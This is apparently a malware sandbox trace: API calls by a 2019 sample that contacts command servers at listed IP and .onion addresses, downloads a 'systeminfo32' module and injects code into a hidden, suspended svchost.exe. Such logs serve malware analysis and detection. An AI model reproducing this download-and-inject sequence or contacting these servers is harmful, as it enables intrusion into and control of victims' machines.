Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/0/Windows 7 x86 SP1/1058/84.182.248.91/E8BC99265198FF1B122E2AA85B368523CB02BE18D865E27FA7C76B40094A3089/2If1Jg2IfxKgxGXp5Sj2/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 51.77.92.215/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/0/Windows 7 x86 SP1/1058/84.182.248.91/E8BC99265198FF1B122E2AA85B368523CB02BE18D865E27FA7C76B40094A3089/2If1Jg2IfxKgxGXp5Sj2/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Read Response	size = 899, size_out = 899	1	Fn Data
System	Get Info	type = Operating System	1	Fn
System	Get Time	type = System Time, time = 2019-05-14 15:32:07 (UTC)	1	Fn
File	Get Info	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32, type = file_attributes	1	Fn
Inet	Open Session	user_agent = Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36, access_type = WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, flags = WINHTTP_FLAG_SYNC	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = cd4fhnyg2337dgxk.onion, server_port = 448	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
System	Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
System	Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = cd4fhnyg2337dgxk.onion/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/	1	Fn
System	Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
System	Sleep	duration = 20000 milliseconds (20.000 seconds)	1	Fn
Inet	Close Session	-	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 5.188.108.22, server_port = 447	1	Fn
Inet	Open HTTP Request	http_verb = GET, http_version = HTTP 1.1, target_resource = /tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/, accept_types = 0, flags = INTERNET_FLAG_SECURE	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 5.188.108.22/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/systeminfo32/	1	Fn
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Read Response	size = 3813, size_out = 3813	1	Fn Data
Inet	Read Response	size = 8192, size_out = 8192	1	Fn Data
Inet	Read Response	size = 4124, size_out = 4124	1	Fn Data
Inet	Read Response	size = 431, size_out = 431	1	Fn Data
System	Get Info	type = Operating System	1	Fn
File	Create	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ	1	Fn
File	Write	filename = C:\Users\2XC7u663GxWc\AppData\Roaming\chromedata\Data\systeminfo32, size = 16560	1	Fn Data
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Module	Load	module_name = wtsapi32, base_address = 0x73f10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSEnumerateSessionsA, address_out = 0x73f14023	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSFreeMemory, address_out = 0x73f11b65	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x0	1	Fn
Module	Get Address	module_name = c:\windows\system32\wtsapi32.dll, function = WTSQueryUserToken, address_out = 0x73f11f81	1	Fn
User	Lookup Privilege	privilege = SeTcbPrivilege, luid = 7	1	Fn
Process	Create	process_name = svchost.exe, os_pid = 0x4d8, creation_flags = CREATE_SUSPENDED, CREATE_NORMAL_PRIORITY_CLASS, CREATE_UNICODE_ENVIRONMENT, CREATE_NO_WINDOW, startup_flags = STARTF_USESHOWWINDOW, STARTF_FORCEOFFFEEDBACK, show_window = SW_HIDE	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 327680, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 367	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x50000, size = 367	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SignalObjectAndWait, address_out = 0x76b761d9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WaitForSingleObject, address_out = 0x76b5ba90	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ResetEvent, address_out = 0x76b5bcb4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x76b6214f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 393216, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 112	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Process	Get Info	type = PROCESS_BASIC_INFORMATION	1	Fn
Memory	Read	process_name = svchost.exe, address = 2147348480, size = 16	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 6291456, size = 64	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 6291672, size = 248	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x602104, size = 12	1	Fn Data
Thread	Resume	process_name = c:\windows\system32\svchost.exe, os_tid = 0x9e8	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 268435456, allocation_type = MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 28672	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 268435456, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10000000, size = 1024	1	Fn Data
Memory	Protect	process_name = svchost.exe, address = 268435456, protection = PAGE_READONLY, size = 1024	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 268439552, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 10240	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10001000, size = 10240	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 268451840, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 3584	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004000, size = 3584	2	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 268455936, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1004	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10005000, size = 1004	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x10005000, size = 512	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 268460032, allocation_type = MEM_COMMIT, protection = PAGE_READWRITE, size = 1024	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10006000, size = 1024	2	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryW, address_out = 0x76b63c01	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 26	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 26	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 12	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 17	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004018, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 14	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 14	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000401c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 15	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004020, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 20	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004024, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 9	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004028, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 15	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 15	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000402c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 12	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 12	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004030, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 10	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 10	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004034, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 9	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 9	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004038, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 17	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000403c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 25	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 25	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004040, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 18	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 18	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004044, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 17	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 17	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004048, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 24	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 24	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x1000404c, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 20	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 20	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004050, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Memory	Allocate	process_name = svchost.exe, address = 131072, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 19	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x20000, size = 19	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Allocate	process_name = svchost.exe, address = 917504, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 16	1	Fn
Memory	Write	process_name = svchost.exe, address = 0xe0000, size = 16	1	Fn Data
Memory	Write	process_name = svchost.exe, address = 0x60000, size = 112	1	Fn Data
Memory	Read	process_name = svchost.exe, address = 393216, size = 112	1	Fn Data
Memory	Free	process_name = svchost.exe, address = 917504, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Free	process_name = svchost.exe, address = 131072, free_type = MEM_RELEASE, size = 0	1	Fn
Memory	Write	process_name = svchost.exe, address = 0x10004054, size = 4	1	Fn Data
Module	Get Handle	module_name = c:\windows\system32\kernel32.dll, base_address = 0x76b10000	1	Fn
